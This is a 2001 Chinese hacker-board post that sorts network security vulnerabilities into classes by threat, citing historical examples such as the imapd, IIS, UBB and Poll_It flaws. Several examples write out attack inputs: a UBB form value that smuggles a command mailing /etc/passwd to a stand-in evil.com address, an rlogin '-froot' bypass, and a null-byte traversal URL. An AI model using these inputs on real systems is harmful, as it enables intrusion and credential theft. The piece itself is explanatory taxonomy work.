计算机网络系统安全漏洞分类研究.txt

BBS的精华之处

发信人: Car (承受), 信区: Hacker 
标  题: 计算机网络系统安全漏洞分类研究 
发信站: 哈工大紫丁香 (2001年12月30日21:57:18 星期天), 站内信件 
  
本文的目地是为了总结一些东西，解决在试图构造一个漏洞数据库的过程中碰到的主要 
问题，也就是如何对计算机网络漏洞进行分类的问题。文中的一些想法并不成熟，有些 
甚至连自己也不满意，权作抛砖引玉，以期与在这方面有深入研究的同仁交流，共同提 
高完善。 
一个计算机网络安全漏洞有它多方面的属性，我认为主要可以用以下几个方面来概括： 
漏洞可能造成的直接威胁，漏洞的成因，漏洞的严重性，漏洞被利用的方式。以下的讨 
论将回绕这几个方面对漏洞细分其类。 
A．按漏洞可能对系统造成的直接威胁 
可以大致分成以下几类，事实上一个系统漏洞对安全造成的威胁远不限于它的直接可能 
性，如果攻击者获得了对系统的一般用户访问权限，他就极有可能再通过利用本地漏洞 
把自己升级为管理员权限： 
一．远程管理员权限 
攻击者无须一个账号登录到本地直接获得远程系统的管理员权限，通常通过攻击以root 
身份执行的有缺陷的系统守护进程来完成。漏洞的绝大部分来源于缓冲区溢出，少部分 
来自守护进程本身的逻辑缺陷。 
典型漏洞： 
１． IMAP4rev1 v10.190版的守护进程imapd的AUTHENTICATE命令存在读入参数时未做长 
度检查，构造一个精心设计的AUTH命令串，可以溢出imapd的缓冲区，执行指定的命令， 
由于imapd以root身份运行，从而直接获得机器的root权限。 
２． WindowsNT　IIS 4.0的ISAPI DLL对输入的URL未做适当的边界检查，如果构造一个 
超长的URL，可以溢出IIS (inetinfo.exe)的缓冲区，执行我们指定的代码。由于ineti 
nfo.exe是以local system身份启动，溢出后可以直接得到管理员权限。 
３． 早期AIX 3.2 rlogind代码存在认证逻辑缺陷，用rlogin victim.com –l –froo 
t，可以直接以root身份登录到系统而无须提供口令。 
二．本地管理员权限 
攻击者在已有一个本地账号能够登录到系统的情况下，通过攻击本地某些有缺陷的suid 
程序，竞争条件等手段，得到系统的管理员权限。 
典型漏洞： 
１． RedHat Linux的restore是个suid程序，它的执行依靠一个中RSH的环境变量，通过 
设置环境变量PATH，可以使RSH变量中的可执行程序以root身份运行，从而获得系统的r 
oot权限。 
２． Solaris 7的Xsun程序有suid位，它对输入参数未做有效的边界检查，可以很容易 
地溢出它的缓冲区，以root身份运行我们指定的代码，从而获得管理员权限。 
３． 在windows2000下，攻击者就有机会让网络DDE（一种在不同的Windows机器上的应 
用程序之间动态共享数据的技术）代理在本地系统用户的安全上下文中执行其指定的代 
码，从而提升权限并完全控制本地机器。 
三．普通用户访问权限 
攻击者利用服务器的漏洞，取得系统的普通用户存取权限，对UNIX类系统通常是shell访 
问权限，对Windows系统通常是cmd.exe的访问权限，能够以一般用户的身份执行程序， 
存取文件。攻击者通常攻击以非root身份运行的守护进程，有缺陷的cgi程序等手段获得 
这种访问权限。 
典型漏洞： 
１． UBB是个广泛运行于各种UNIX和Windows系统的论坛程序，用PERL实现，它的5.19以 
下版本存在输入验证问题，通过提交精心构造的表单内容，可以使UBB去执行shell命令 
，因为一般的web服务器以nobody身份运行，因此可以得到一个nobody shell。比如提交 
这样的数据：topic='012345.ubb|mail hacker@evil.com </etc/passwd|'，我们就可以 
得到系统的passwd文件。 
２． RedHat Linux 6.2带的innd 2.2.2.3版新闻服务器，存在缓冲区溢出漏洞，通过一 
个精心构造的新闻信件可以使innd服务器以news身份运行我们指定的代码，得到一个in 
nd权限的shell。 
３． Windows　IIS 4.0-5.0存在Unicode解码漏洞，可以使攻击者利用cmd.exe以guest 
组的权限在系统上运行程序。相当于取得了普通用户的权限。 
四．权限提升 
攻击者在本地通过攻击某些有缺陷的sgid程序，把自己的权限提升到某个非root用户的 
水平。获得管理员权限可以看做是一种特殊的权限提升，只是因为威胁的大小不同而把 
它独立出来。 
典型漏洞： 
１． RedHat Linux 6.1带的man程序为sgid man，它存在format bug，通过对它的溢出 
攻击，可以使攻击者得到man组的用户权限。 
２． Solaris 7的write程序为sgid tty，它存在缓冲区溢出问题，通过对它的攻击可以 
攻击者得到tty组的用户权限。 
３． WindowsNT系统中，攻击者能够使系统中其他用户装入一个”特洛化”的porfile， 
使其他用户执行攻击者的恶意代码，有时甚至是管理员。 
五．读取受限文件 
攻击者通过利用某些漏洞，读取系统中他应该没有权限的文件，这些文件通常是安全相 
关的。这些漏洞的存在可能是文件设置权限不正确，或者是特权进程对文件的不正确处 
理和意外dump core使受限文件的一部份dump到了core文件中。 
典型漏洞： 
１． SunOS 5.5的ftpd存在漏洞，一般用户可以引起ftpd出错而dump出一个全局可读的 
core文件，里面有shadow文件的片断，从而使一般用户能读到shadow的部分内容。 
２． SuSE 6.2的suid程序pg，对它的配置文件处理存在问题，当把pb.conf链接到特权 
文件，可以用pb读取那些文件的内容。 
３． Oracle 8.0.3 Enterprise Edition for NT 4.0的日志文件全局可读而且为明文， 
它记录了连接的口令，很可能被攻击者读到。 
六．远程拒绝服务 
攻击者利用这类漏洞，无须登录即可对系统发起拒绝服务攻击，使系统或相关的应用程 
序崩溃或失去响应能力。这类漏洞通常是系统本身或其守护进程有缺陷或设置不正确造 
成的。 
１． 早期的Linux 和 BSD的tcp/ip堆栈的ip 片断重组模块存在缺陷，攻击通过向系统 
发出特殊的ip片断包可以使机器崩溃。 
２． Windows2000带的Netmeeting 3.01存在缺陷，通过向它发送二进制数据流，可以使 
服务器的CPU占用达到100%。 
３． 通过发送一个带有超长参数的USER命令给AnalogX Proxy Server 4.04的ftp端口， 
可以使这个应用程序崩溃。 
七．本地拒绝服务 
在攻击者登录到系统后，利用这类漏洞，可以使系统本身或应用程序崩溃。这种漏洞主 
要因为是程序对意外情况的处理失误，如写临时文件之前不检查文件是否存在，盲目跟 
随链接等。 
１． BSDi 3.x存在漏洞可以使一个本地用户用一些垃圾覆盖系统上的任何，这样会很容 
易地把系统搞成不可用。 
２． RedHat 6.1的tmpwatch程序存在缺陷，可以使系统fork()出许多进程，从而使系统 
失去响应能力。 
八．远程非授权文件存取 
利用这类漏洞，攻击可以不经授权地从远程存取系统的某些文件。这类漏洞主要是由一 
些有缺陷的cgi程序引起的，它们对用户输入没有做适当的合法性检查，使攻击者通过构 
造特别的输入获得对文件存取。 
典型漏洞： 
１． Poll_It_SSI_v2.0.cgi存在漏洞可以使攻击者看到web目录外的所有有权限看的文 
件，发送如下的请求给服务器就能看到/etc/passwd文件，http://www.targethost.com 
/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00 
２． Windows IIS 5.0存在一个漏洞，通过向它发送一个特殊的head标记，可以得到as 
p源码，而不是经过解释执行后asp页面。 
３． Windows IE存在诸多漏洞允许恶意的web页面读取浏览用户的本地的文件。 
九．口令恢复 
因为采用了很弱的口令加密方式，使攻击者可以很容易的分析出口令的加密方法，从而 
使攻击者通过某种方法得到密码后还原出明文来。